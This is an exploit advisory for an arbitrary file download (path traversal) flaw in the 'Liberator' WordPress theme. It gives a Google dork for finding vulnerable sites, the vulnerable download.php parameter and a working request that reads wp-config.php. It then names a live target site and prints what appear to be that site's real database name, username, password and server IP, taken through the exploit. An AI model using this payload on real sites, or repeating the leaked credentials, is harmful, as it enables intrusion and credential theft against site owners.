WordPress 5.1.1 Liberator Themes Arbitrary File Download

1. ############################################################################################
2.  
3. # Exploit Title : WordPress 5.1.1 Liberator Themes Arbitrary File Download
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 18/03/2019
7. # Vendor Homepage : wordpress.org ~ televox.com
8. # Software Information Link : televox.com/website-design/
9. televox.com/webvox/wp-content/themes/liberator/readme.txt
10. # Software Affected Version : 4.x - 5.x - 5.1.1
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # Google Dorks : inurl:"/wp-content/themes/liberator/inc/"
15. # Vulnerability Type :
16. CWE-200 [ Information Exposure ]
17. CWE-23 [ Relative Path Traversal ]
18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
21. # Reference Link : cxsecurity.com/issue/WLB-2019030143
22.  
23. ############################################################################################
24.  
25. # Impact :
26. ***********
27. * WordPress 5.1.1 Liberator Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
28.  
29. fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
30.  
31. web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
32.  
33. of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
34.  
35. vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
36.  
37. properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
38.  
39. ############################################################################################
40.  
41. Vulnerable File =>
42.  
43. /download.php
44.  
45. Vulnerable Parameter =>
46.  
47. ?download_file=
48.  
49. # Arbitrary File Download Exploit :
50. *******************************
51. /PATH/wp-content/themes/liberator/inc/php/download.php?download_file=[FILENAME]
52.  
53. /wp-content/themes/liberator/inc/php/download.php?download_file=[FILENAME]
54.  
55. /wp-content/themes/liberator/inc/php/download.php?download_file=../../wp-config.php
56.  
57. Informations About MySQL Configuration File =>
58. *******************************************
59. ** The name of the database for WordPress */
60. define('DB_NAME', '');
61.  
62. /** MySQL database username */
63. define('DB_USER', '');
64.  
65. /** MySQL database password */
66. define('DB_PASSWORD', '');
67.  
68. /** MySQL hostname */
69. define('DB_HOST', '');
70.  
71. ############################################################################################
72.  
73. [+] televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../../wp-config.php
74.  
75. ** The name of the database for WordPress */
76. define('DB_NAME', 'wpwestprod');
77.  
78. /** MySQL database username */
79. define('DB_USER', 'srvwpuser');
80.  
81. /** MySQL database password */
82. define('DB_PASSWORD', '3ncrypt3d^01');
83.  
84. /** MySQL hostname */
85. define('DB_HOST', '75.78.178.16');
86.  
87. ############################################################################################
88.  
89. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
90.  
91. ############################################################################################